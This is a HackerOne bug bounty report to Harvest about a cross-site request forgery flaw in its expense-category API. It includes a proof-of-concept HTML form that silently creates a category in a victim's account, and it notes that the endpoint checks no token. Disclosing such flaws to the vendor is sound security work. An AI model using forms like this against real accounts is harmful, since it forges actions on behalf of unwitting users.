Harvest: Cross-Site Request Forgery (CSRF)

ID H1:152569
Type hackerone
Reporter malcolmx
Modified 2016-10-13T20:22:30


Hello, I Found Cross-Site Request Forgery (CSRF) while made new Category

POC : ``` <html> <body> <form action="https://[any_user_site].harvestapp.com/api/v2/expense_categories"

method="POST"> <input type="hidden" name="name" value="[category_name]" /> <input type="hidden" name="unit_price" value="" /> <input type="hidden" name="unit_name" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>


just put user site and the name of the category on this HTML Form and the category will be created to this account. there is no any token to validate the request here so the attacker can use this to made a CSRF attack to any victim account

Please Watch My POC I Attached For More Details